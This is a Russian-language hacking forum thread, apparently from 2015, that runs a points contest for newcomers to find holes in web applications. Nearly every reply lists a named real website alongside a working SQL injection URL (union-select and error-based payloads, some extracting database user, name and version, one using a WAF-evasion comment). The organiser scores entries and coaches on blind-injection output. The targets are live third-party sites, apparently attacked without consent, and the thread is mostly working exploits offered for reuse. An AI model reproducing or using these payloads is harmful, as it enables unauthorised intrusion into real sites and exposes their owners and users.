Конкурс уязвимостей для новичков

Обсуждение в разделе «Песочница», начал(-а) yarbabin, 1.06.2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    Правила:
    Ваша задача найти уязвимости в веб-приложениях.
    Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" :)).
    Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.
    За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
    В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

    Уязвимости:
    • SQL Injection (2 балла)
    • Stored XSS (2 балла)
    • Reflected XSS (1 балл)
    • Local File Inclusion (3 балла)
    • Remote File Inclusion (4 балла)
    • Remote Code Execution (5 баллов)
    • XXE (5 баллов)
    • Arbitary File Read (3 балла)

    Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

    Типы уязвимостей:
    • Оранжевые (с приложенным исходным кодом уязвимости)
    • Серые (эксплоит без кода)
     
    _________________________
  2. dmn75

    dmn75 Member

    Регистрация:
    11.05.2015
    Сообщения:
    46
    Одобрения:
    45
    Репутация:
    1
    Буду первым. Если что не так подправьте
    Site: dkcity.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
    Site: knitty.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
     
    #2 dmn75, 4.06.2015
    В последний раз редактировалось модератором: 4.06.2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

    P. S. активнее, ребят :)
     
    _________________________
    Это одобряет Billi Damn.
  4. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    709
    Одобрения:
    811
    Репутация:
    51
    А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    исходники с уязвимостью прибавляют баллы, но можно и без них
     
    _________________________
  6. dmn75

    dmn75 Member

    Регистрация:
    11.05.2015
    Сообщения:
    46
    Одобрения:
    45
    Репутация:
    1
    Да, тулзой кручу.


    Сайт: theatreinchicago.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

    Сайт: tsgconsumer.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

    Сайт: alicekwartler.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

    Сайт: athenscine.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

    Сайт: classifieds.chiangmaicitylife.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

    Сайт: cstv.collegesports.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

    Сайт: ctnrecruiting.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

    Сайт: diarionecochea.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

    Сайт: dogarchive.kennel-apbt.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

    Сайт: eu.bosscom.com
    Уязвимость: SQL Injection

    Эксплоит:
    Code:
    http://eu.bosscom.com/product.asp?id=[t]
    Какой именно запрос на вывод нужен?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    если blind, то хотя бы substring версии
     
    _________________________
  8. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 646
    Одобрения:
    666
    Репутация:
    833
    substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
     
    _________________________
    Это одобряет Take_IT.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    а разница? :)
     
    _________________________
  10. BigBear

    BigBear Well-Known Member
    Гарант - Escrow Service

    Регистрация:
    4.12.2008
    Сообщения:
    1 646
    Одобрения:
    666
    Репутация:
    833
    Для развеивания шаблонного мышления.
     
    _________________________
  11. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.
     
    _________________________
  12. Печа

    Печа Member

    Регистрация:
    9.05.2015
    Сообщения:
    46
    Одобрения:
    21
    Репутация:
    17
    Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.

    Сайт: isotropix.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,999,8,9,10,11,12,13,14,15,16,17,18
    Сайт: judgement-yard.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75
    Сайт: newchristian.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2,999
    Сайт: patagonianshells.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4,999,6--
    Сайт: rhodesnow.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20,1,2%20and%20%220%22=%220&lang=english
    Сайт: seavernon.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1
    Сайт: watch-clock.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999
     
    #12 Печа, 7.06.2015
    В последний раз редактировалось: 15.06.2015
  13. Rypjaer

    Rypjaer Banned

    Регистрация:
    23.05.2015
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    2
    Сайт: www.justintime.in
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+
    Сайт: www.hergolfgame.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+
    Сайт: www.secretslk.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
    Сайт: dianaboutiquebd.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
    Сайт: www.localfirstaz.com
    Уязвимость: SQLi
    Эксплоит:

    Code:
    http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    добавил в таблицу.
    на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод
     
    _________________________
  15. 3nvY

    3nvY Member

    Регистрация:
    8.06.2015
    Сообщения:
    45
    Одобрения:
    13
    Репутация:
    9
    Сайт: hexonline.co.uk
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
    Сайт: fleurlis.com.tw
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-
    Сайт: pnelsoncomposer.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-
    Сайт: puccimanuli.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+
    Сайт: boutique.rrconcept.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
     
    #15 3nvY, 11.06.2015
    В последний раз редактировалось: 12.06.2015
    Это одобряет K800.
  16. semen6192

    semen6192 New Member

    Регистрация:
    9.06.2015
    Сообщения:
    24
    Одобрения:
    2
    Репутация:
    2
    #16 semen6192, 14.06.2015
    В последний раз редактировалось модератором: 14.06.2015
  17. Печа

    Печа Member

    Регистрация:
    9.05.2015
    Сообщения:
    46
    Одобрения:
    21
    Репутация:
    17
    Сайт: http://www.yd1688.com
    Уязвимость: SQL Injection
    Эксплоит:
    Code:
    http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    предыдущие поправьте на нормальный вывод.
    все, 20 баллов набрано, поздравляю!
     
    _________________________
    Это одобряет 3nvY.
  19. Neon2211

    Neon2211 New Member

    Регистрация:
    15.06.2015
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    0
    Cайт:http://www.cygnethome.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
    Сайт:http://www.blcontrol.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
    Сайт:http://gobpo.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--
    Cайт:http://store.schulmerichbells.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3
    Cайт:http://www.immobilien-niederzier.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999
    Сайт:http://www.focus-lighting.com/
    Уязвимость:
    Эксплойт:
    Code:
    http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9
     
    #19 Neon2211, 15.06.2015
    В последний раз редактировалось модератором: 15.06.2015
  20. yarbabin

    yarbabin HACKIN YO KUT

    Регистрация:
    21.11.2007
    Сообщения:
    1 680
    Одобрения:
    877
    Репутация:
    363
    очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t
     
    _________________________
Загрузка...